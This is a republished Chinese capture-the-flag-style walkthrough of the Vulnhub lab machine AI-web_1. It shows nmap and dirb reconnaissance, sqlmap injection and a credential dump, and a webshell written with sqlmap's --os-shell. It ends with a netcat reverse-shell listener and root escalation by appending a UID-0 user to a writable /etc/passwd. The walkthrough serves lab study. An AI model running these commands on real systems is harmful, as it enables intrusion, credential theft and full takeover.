2026-01-04 01:46:37 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文详述Vulnhub靶机AI-web_1的渗透实战流程。通过Nmap与目录扫描发现敏感路径及phpinfo泄露，利用sqlmap实现SQL注入获取数据库权限，并结合绝对路径写入Webshell获取控制权。最后利用/etc/passwd可写漏洞创建Root用户完成提权并获取flag。 综合评分： 82 文章分类： 渗透测试,WEB安全,实战经验

cover_image

vulnhub靶机_AI-web_1靶机练习

原创

解铃

解铃信安

2026年1月2日 18:07 广东

靶机环境信息

| | | | — | — | | 名称 | 介绍 | | 靶场名称 | AI-web_1 | | 靶机系统 | Ubuntu 18.04.3LTS | | 靶机IP | 192.168.15.164 | | 攻击机系统 | Kali Linux（渗透测试主机，包含Nmap、Metasploit、ExploitDB等工具） | | 攻击机IP | 192.168.15.3 | | 网络模式 | NAT | | 目标 | 获取靶机root权限，拿到flag |

打靶流程

1.nmap主机发现

nmap&nbsp;-sP&nbsp;192.168.15.0

2.nmap信息收集

nmap&nbsp;-sS -sV -p- -O&nbsp;192.168.15.164&nbsp;#-sS syn包扫描#-p- 扫描全端口#-sV： 探测开放端口以确定服务/版本信息#-O 扫描操作系统类型

这里发现靶机开启了80端口，存在web服务。

3.web信息收集

可以看到无明显敏感信息。

4.dirb目录扫描

dirb&nbsp;http://192.168.15.164/

在robots.txt发现了/m3diNf0/，/se3reTdir777/uploads/两个路径。

5.继续web信息收集

发现两个页面都是提示Forbidden，继续目录扫描

6.dirb目录扫描

&nbsp;dirb&nbsp;http://192.168.15.164/m3diNf0/

这里扫出了一个info.php，访问查看。

7.拼接访问info.php

发现是一个php配置信息页面,也无进一步利用点。

8.访问/se3reTdir777/

发现这里有个用户id查询的功能点，测试一下sql注入。

9.sqlmap扫描

sqlmap&nbsp;-u&nbsp;"http://192.168.15.164/se3reTdir777/"&nbsp;-forms&nbsp;-forms&nbsp;#自动从-u中的url获取页面中的表单进行测试。

发现存在sql注入点，下面进行爆数据。

10.sqlmap爆数据

sqlmap -u&nbsp;"http://192.168.15.164/se3reTdir777/"&nbsp;-forms -D aiweb1 -T systemUser -C&nbsp;id,password,userName --dump

这里得到三个用户账号密码，但根据前面扫描信息未发现可测试登录端口。参数os-shell写shell。

11.sqlmap –os-shell写入shell

需要知道网站的绝对路径。当前用户要拥有网站的写入权限。在 MySQL 中，有一个参数规定可写入的目录，当参数为空或为指定路径（且是所需路径）时可进行写入。若参数为空可任意写入

这里因为前面有泄露出phpinfo信息，所以我们可以网站的绝对路径，进而测试是否可以写入。

在/home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/目录可以写入。

--os-shell工作原理在 MySQL 数据库环境下，--os-shell 的实现方式主要涉及以下步骤：创建 PHP 文件：首先，sqlmap 利用&nbsp;SQL&nbsp;注入漏洞在服务器上创建一个 PHP 文件（如 tmpugvzq.php），该文件提供文件上传功能。上传命令执行文件：通过 tmpugvzq.php，sqlmap 上传另一个 PHP 文件（如 tmpbylqf.php），该文件用于执行系统命令并返回结果。执行系统命令：用户可以通过 sqlmap 输入命令，这些命令会通过 tmpbylqf.php 在服务器上执行，并将输出结果返回给 sqlmap。

12.通过tmpugvzq.php上传反弹shell

13.nc接管shell

&nbsp;nc&nbsp;-lvnp&nbsp;6666python&nbsp;-c 'import pty;pty.spawn("/bin/bash")'

14./etc/passwd写入提权

ls&nbsp;-lh /etc/passwd

openssl passwd&nbsp;expecho&nbsp;"exp:moXyna2IitJC2:0:0:root:/root:/bin/bash"&nbsp;>>&nbsp;/etc/passwdsu&nbsp;exp

15.查看flag

总结

1.sqlmap –os-shell工作原理与利用条件

2./etc/passwd可写提权

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：解铃信安解铃《vulnhub靶机AI-web1靶机练习》